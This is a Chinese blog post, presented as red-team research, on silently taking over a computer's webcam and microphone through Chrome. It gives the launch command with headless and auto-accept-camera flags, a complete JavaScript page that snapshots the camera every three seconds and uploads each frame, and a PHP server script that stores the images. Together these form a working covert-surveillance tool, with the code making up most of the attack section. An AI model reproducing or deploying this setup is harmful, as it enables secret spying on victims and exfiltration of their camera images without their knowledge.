红队场景下的浏览器滥用:静默接管摄像头与麦克风

moboyou 2025-08-23 07:06 8 浏览

红队场景下的浏览器滥用：静默接管摄像头与麦克风

前言:

在某些红队行动演练中，攻击者并不会直接丢入可疑的恶意程序，而是巧妙地 以合法之名行恶意之实 ，利用系统自带或被信任的合法程序（白文件）执行恶意操作。这种手法被称为 LOLBins 攻击 （Living Off the Land Binaries）。由于这些程序本身已被系统签名并列入安全白名单，安全软件往往对其放行，攻击者便可在不触发告警的情况下，实现文件下载、命令执行、数据窃取，甚至是摄像头与麦克风的静默监听，从而在受害者毫无察觉的情况下达成渗透与监控的目的。

例如Windows的certutil.exe工具，本是用于管理证书的工具，但攻击者可以利用它从远程服务器下载并解码恶意文件（但这种方式早已被各大杀软、EDR标记)。在安全软件眼中，这一切都是“正常的系统行为”。由于这些程序本身已被系统签名并列入安全白名单，防护机制往往会放行，攻击者便可在不触发告警的情况下，实现文件下载、命令执行、数据窃取，甚至是摄像头与麦克风的静默监听，从而在受害者毫无察觉的情况下达成渗透与监控的目的。

今天，我将向大家展示一种技术方法，能够在静默状态下监控本地摄像头和麦克风。本文参考了这篇文章
https://mrd0x.com/spying-with-chromium-browsers-camera/，作者的思路非常巧妙。

通过学习这类新型攻击方法，可以更清楚地了解潜在的安全风险，从而在网络的“黑暗森林”中预防那些无形的威胁。

正文:

现代浏览器可以通过Javascript访问本地摄像头、麦克风，网页就能获取到用户的摄像头视频流并显示在页面上。不过，这并不是随便就能用的，浏览器会先弹出权限请求，让用户选择是否允许访问，这是为了保护隐私和安全。通过以下这段代码进行实现，通过浏览器访问本地摄像头。

html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>浏览器访问本地摄像头示例title>
head>
<body>
    <h2>预览摄像头h2>
    <video id="video" width="640" height="480" autoplay>video>

    <script>
        // 获取 video 元素
        const video = document.getElementById('video');

        // 请求访问摄像头
        navigator.mediaDevices.getUserMedia({ video: true, audio: false })
            .then(stream => {
                // 将摄像头流绑定到 video 元素
                video.srcObject = stream;
            })
            .catch(err => {
                console.error("无法访问摄像头: ", err);
                alert("无法访问摄像头，请检查权限或设备！");
            });
    script>
body>
html>

直接打开该文件后Chrome会弹出提示询问用户是否允许此文件访问摄像头，如果用户点击不允许，则无法将摄像头的事实内容呈现在页面中。

点击允许后才能获取到实时的摄像头画面呈现到HTML页面中。

静默方式打开摄像头、麦克风

在mrd0x的这篇文章中介绍了一种方法，利用Chrome命令行参数在静默无需手动点击等交互的场景下打开摄像头、麦克风(这个过程也不会打开浏览器窗口)。主要利用两个命令行参数来实现，分别是 --headless、
--auto-accept-camera-and-microphone-capture。

Chrome 启动参数（Command-line Flags） 是在启动 Chrome 或 Chromium 浏览器时，附加在命令行里的特殊指令，用来 改变浏览器的默认行为。

这个网页下有Chrome各个启动参数的详细介绍

https://peter.sh/experiments/chromium-command-line-switches/

关键启动命令:

--headless

--headless 是 Chrome / Chromium 的一个启动参数，用来 让浏览器在“无界面模式”下运行 ，也就是没有图形界面，不会弹出浏览器窗口。学过python的朋友应该知道Chromium爬虫，就是无界面浏览器，常用于页面需要js渲染、加解密绕过的场景。

--auto-accept-camera-and-microphone-capture

--auto-accept-camera-and-microphone-capture 是 Chrome / Chromium 的一个启动参数 ，作用是 自动允许网页访问摄像头和麦克风 ，无需用户手动点击“允许”。

静默启动浏览器并自动允许打开麦克风或摄像头 .\chrome.exe --headless --auto-accept-camera-and-microphone-capture http://example.com

启动浏览器（当前目录下的 chrome.exe）。
在 无界面模式 下运行。
静默自动授权 网页访问摄像头和麦克风，然后访问指定网址。

编辑一个网页JS获取摄像头视频流，每隔3s截取一次画面上传到服务器。 html > < html > < head > head > < body > < video id = "video" autoplay playsinline > video > < canvas id = "canvas" width = "1000" height = "1000" style = "display:none;" > canvas > < script > // 获取视频元素和画布元素 const video = document .getElementById( 'video' ); const canvas = document .getElementById( 'canvas' ); // 获取画布 2D 绘图上下文，用于绘制图像 const context = canvas.getContext( '2d' ); /** * 开始摄像头捕获 * 调用浏览器的 MediaDevices API 获取视频流 */ function startCapture ( ) { navigator.mediaDevices.getUserMedia({ video : true }).then( stream => { // 将获取到的视频流绑定到 video 元素上进行播放 video.srcObject = stream; // 每隔 3 秒截取一次画面并上传 setInterval( () => takeAndUploadSnapshot(), 3000 ); }); } /** * 截图并上传到服务器 */ function takeAndUploadSnapshot ( ) { // 将当前视频帧绘制到 canvas 上 context.drawImage(video, 0 , 0 , canvas.width, canvas.height); // 生成唯一的文件名（时间戳防重复） const timestamp = Date .now(); const filename = `imgCapture- ${timestamp} .png` ; // 将 canvas 内容转换成 Base64 编码的 PNG 图片 const dataUrl = canvas.toDataURL( 'image/png' ); // 发送 POST 请求，将图片数据和文件名上传到服务器 fetch( 'upload.php' , { method : 'POST' , headers : { 'Content-Type' : 'application/json' }, body : JSON .stringify({ image : dataUrl, // Base64 图片数据 filename : filename // 图片文件名 }) }); } // 页面加载时启动摄像头捕获 startCapture(); script > body > html >

服务端接收截图 $data = json_decode(file_get_contents( "php://input" ), true ); // 基础字段检查 if (!$data || ! isset ($data[ 'image' ]) || ! isset ($data[ 'filename' ])) { http_response_code( 400 ); exit ( 'Invalid request data' ); } $imageBase64 = $data[ 'image' ]; $filename = $data[ 'filename' ]; // 检查文件扩展名是否为 .png（不区分大小写） if (strtolower(pathinfo($filename, PATHINFO_EXTENSION)) !== 'png' ) { http_response_code( 400 ); exit ( 'Only .png files are allowed' ); } // 检查 Base64 数据头是否是 PNG if (strpos($imageBase64, 'data:image/png;base64,' ) !== 0 ) { http_response_code( 400 ); exit ( 'Invalid image format' ); } // 移除 Base64 头并解码 $base64String = preg_replace( '#^data:image/png;base64,#i' , '' , $imageBase64); $imageData = base64_decode($base64String, true ); // 检查 Base64 解码是否成功 if ($imageData === false ) { http_response_code( 400 ); exit ( 'Base64 decode failed' ); } // 目录设置（确保存在且可写） $uploadDir = '/var/www/imgCapture' ; if (!is_dir($uploadDir)) { mkdir($uploadDir, 0755 , true ); } // 使用安全文件名（防止目录穿越） $safeFilename = preg_replace( '/[^a-zA-Z0-9_\-\.]/' , '_' , $filename); $filePath = $uploadDir . '/' . $safeFilename; // 写入文件 if (file_put_contents($filePath, $imageData)) { echo json_encode([ 'success' => true ]); } else { http_response_code( 500 ); echo json_encode([ 'success' => false ]); } ?>

--handless
--auto-accept-camera-and-microphone-capture 启动Chrome，无窗口、自动允许打开麦克风、摄像头。

服务器这边成功接收截图，打个码。

部署html、php的服务器必须是https的，http会导致触发安全策略。

参考
:https://mrd0x.com/spying-with-chromium-browsers-camera/

php源码打包成exe

上一篇：激活Win10预览版时提示版本不匹配的解决办法
下一篇：ngrok本地服务器工具，微信开发本机代码部署外网访问神器

红队场景下的浏览器滥用:静默接管摄像头与麦克风

红队场景下的浏览器滥用：静默接管摄像头与麦克风

前言:

正文:

静默方式打开摄像头、麦克风

关键启动命令:

相关推荐

Linux环境中查看Oracle错误和警告日志信息

絮语----工作四年的碎碎念

SQL 中的 (+)用法

oracle常见问题处理

MYSQL经典面试题汇总

医院信息系统突发应急演练记录

Windows 11:已知问题和已解决问题列表(更新时间:2022年1月)

最全面的IBMS系统集成系统技术规格书，赶紧收藏起来!

苹果停止更新Windows版QuickTime!

Linux下开源BI工具Metabase本地化安装及配置详解